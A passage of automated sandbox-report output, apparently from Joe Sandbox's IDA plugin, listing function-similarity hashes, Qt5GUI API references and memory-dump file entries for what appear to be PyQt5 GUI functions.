                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?getAxes@Concurrency::cancel_current_taskD@@00@Quaternion@@Vector3malloc
                                                                                                                                                                                                                • String ID: (NNN)$QQuaternion$getAxes$getAxes(self) -> (Optional[QVector3D], Optional[QVector3D], Optional[QVector3D])
                                                                                                                                                                                                                • API String ID: 1332125169-3847367654
                                                                                                                                                                                                                • Opcode ID: d340866888418d936c102def5efeb2b852600f29cc4bc5e665ae2c4914922383
                                                                                                                                                                                                                • Instruction ID: f63fd8864a130b7a8711cdab002657bea27969d1459ca1c140600d913f79f4e2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d340866888418d936c102def5efeb2b852600f29cc4bc5e665ae2c4914922383
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C317E72A08B85C5E7608F21E8446AD77ACFB85B84FA5807ADE8D03764CF3CE495C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?pictureFormat@QPictureIO@@SA?AVQByteArray@@AEBVQString@@@Z.QT5GUI ref: 00007FFB9A303C1E
                                                                                                                                                                                                                • ?pictureFormat@QPictureIO@@SA?AVQByteArray@@PEAVQIODevice@@@Z.QT5GUI ref: 00007FFB9A303CA9
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?pictureArray@@ByteFormat@Picture$Device@@@String@@@malloc
                                                                                                                                                                                                                • String ID: QPictureIO$pictureFormat$pictureFormat(fileName: Optional[str]) -> QByteArraypictureFormat(a0: Optional[QIODevice]) -> QByteArray
                                                                                                                                                                                                                • API String ID: 3002846332-1618977619
                                                                                                                                                                                                                • Opcode ID: c80ca681df9a728a12ef453df163d8578752ae6899814c3c7b7910bf0b8f9957
                                                                                                                                                                                                                • Instruction ID: a9785506e9c582bdc875229a670929c49f0cb5b7903443549e4e3f8febb920e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c80ca681df9a728a12ef453df163d8578752ae6899814c3c7b7910bf0b8f9957
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 773161B571CB4682FB608B26E8446AA77A9FF89B84F544076DD4E53724DF3CE144C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fixup@String@@@Validator@@
                                                                                                                                                                                                                • String ID: BJ1$QIntValidator$fixup$fixup(self, input: Optional[str]) -> str
                                                                                                                                                                                                                • API String ID: 151386655-3112718248
                                                                                                                                                                                                                • Opcode ID: b2eae8e07a89f5dfdf30e1e623cfeeadbdadab6f6ef229ef599d7dd4df0ea57a
                                                                                                                                                                                                                • Instruction ID: 930696731df882a9cc64f862f4d7ca67b1a2c75bff14ea79dadf4dda261b2ea7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2eae8e07a89f5dfdf30e1e623cfeeadbdadab6f6ef229ef599d7dd4df0ea57a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0831347670CB8581EB609F65E8443AA77A8FB95B94F548072DE8D43B64DF7CD088D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?position@Block@@Text$Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 3416477650-2407233842
                                                                                                                                                                                                                • Opcode ID: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                • Instruction ID: 18d4f1651acb06d5b140f212c8bb37f5936a79a7f9c2fc9034fa0ba1c25a0e53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 982139BAB0CB4686FB619F65E8041A9B3A8FB85BA5F444075DE4D037A4DF3CE485C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?key@QPageSize@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A35D93C
                                                                                                                                                                                                                • ?key@QPageSize@@SA?AVQString@@W4PageSizeId@1@@Z.QT5GUI ref: 00007FFB9A35D9A4
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Page$?key@Size@@String@@$Id@1@@Sizemalloc
                                                                                                                                                                                                                • String ID: QPageSize$key$key(self) -> strkey(pageSizeId: QPageSize.PageSizeId) -> str
                                                                                                                                                                                                                • API String ID: 4229482282-1788202132
                                                                                                                                                                                                                • Opcode ID: 4d6308a77aaadb67df2e0fad2cddaab0d1171c18150c8a571932d704ced0aaac
                                                                                                                                                                                                                • Instruction ID: 2d34047c9b58322479cd5811fab6749330fa5d32e796a3910ded96fe8de4a132
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d6308a77aaadb67df2e0fad2cddaab0d1171c18150c8a571932d704ced0aaac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E3139B6B18A4682FB60CB75E8586B973A8FB85B94F5480B6CD4D07360DF7CE589C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?createObject@QTextDocument@@MEAAPEAVQTextObject@@AEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A2EFC8B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?createDocument@@Format@@@Object@Object@@
                                                                                                                                                                                                                • String ID: BJ9$QTextDocument$createObject$createObject(self, f: QTextFormat) -> Optional[QTextObject]
                                                                                                                                                                                                                • API String ID: 2112194817-3813377340
                                                                                                                                                                                                                • Opcode ID: 96817f6a642dea5558fca1bc51796851d6adb9a51bce56eae6e7070350b3f0b7
                                                                                                                                                                                                                • Instruction ID: 1d49c0afdbd59bb3ab1b8d172110c9b0b861309331e715ed3c7c9f760657daa5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96817f6a642dea5558fca1bc51796851d6adb9a51bce56eae6e7070350b3f0b7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87212EB6608B46C2FB60DB35E48426A77A8FB95B84F645172DE8D43B64DF3CD045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ8$QRegExpValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 59943102-4000051574
                                                                                                                                                                                                                • Opcode ID: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                • Instruction ID: c2b0878d3a8fb3dfdbc3818eb6627e0a06236eb4869b30b0a8182053557ff4dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690ec265b6efc938f5b8feb84294346ddf968f43f7c6cbfd03b09380635ed334
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7215AB2A0CB46C2EB60CB65E88426A77A8FB85B84F544076DE8D03B34DF3CE049C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                • String ID: BJ8$QWindow$resizeEvent$resizeEvent(self, a0: Optional[QResizeEvent])
                                                                                                                                                                                                                • API String ID: 2314446140-3739113224
                                                                                                                                                                                                                • Opcode ID: 9691ed4ef9c984a6709befa6040865e0a6677ec908cc8433b33ea2dced2c2942
                                                                                                                                                                                                                • Instruction ID: 2e7d62e473df5fe3851b7a798e22565fc7d527af8a409ea7169543a608f515ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9691ed4ef9c984a6709befa6040865e0a6677ec908cc8433b33ea2dced2c2942
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A52110B260CB46C2EB608B25E8842BA77A8FB95B84F548176DE8D43B74EF3CD045D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
